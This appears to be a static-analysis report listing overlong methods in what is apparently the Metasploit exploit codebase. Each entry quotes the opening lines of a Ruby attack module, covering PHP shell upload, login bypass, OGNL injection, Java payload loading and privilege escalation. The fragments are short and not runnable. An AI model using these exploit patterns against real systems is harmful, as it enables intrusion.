Showing 15,730 of 21,757 total issues
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
print_status("Checking injection...")
if check == Exploit::CheckCode::Vulnerable
Method upload_php?
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def upload_php?(login_token, shell_filename)
vprint_status("Uploading PHP file #{shell_filename}")
vars_form_data =
[
{
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
@proto = (ssl ? 'https' : 'http')
if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
uri = normalize_uri(target_uri.path)
payload_name = "#{rand_text_alpha(5)}.php"
print_status("Trying to upload #{payload_name} to mma.php Backdoor")
Method ognl_append_file
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def ognl_append_file(payload_file, payload_chunk)
data_header = datastore['HEADER'] + 'd'
file_header = datastore['HEADER'] + 'f'
headers = {
"#{data_header}": payload_chunk,
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
session_id = login_bypass
fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id
print_good('Login bypass successful')
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
print_status("Checking if the wp-config.php file already exists...")
tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
response = send_request_cgi({ 'uri' => tpath_wp_config }, timeout = datastore['TIMEOUT'])
Method create_function?
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def create_function?(language, func_name)
load_func = ''
case language
when 'perl'
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
Method execute_command
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def execute_command(cmd, opts = {})
target = select_target
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
Method initialize
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
# New installations use a randomly generated suffix like "lyris629dAe536F"
pass = nil
Method authenticate
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def authenticate(username, password)
res = send_request_cgi(
'uri' => '/admin_loginok.html',
'method' => 'POST',
'vars_post' => {
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
Method get_directories
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def get_directories(payload_filepath, targetedDirectories)
directoryNames = []
findFileDataSize = 592
maxPath = client.railgun.const('MAX_PATH')
fileNamePadding = 44
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
page = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
dbl = Rex::MIME::Message.new
Method trigger_urlclassloader
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def trigger_urlclassloader
# Here we construct a XSLT transform to load a Java payload via URLClassLoader.
url = get_uri
vars = Rex::RandomIdentifier::Generator.new({ language: :java })
Method fingerprint
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def fingerprint
res = download_log(rand_text_alphanumeric(12) + '.txt')
return if not res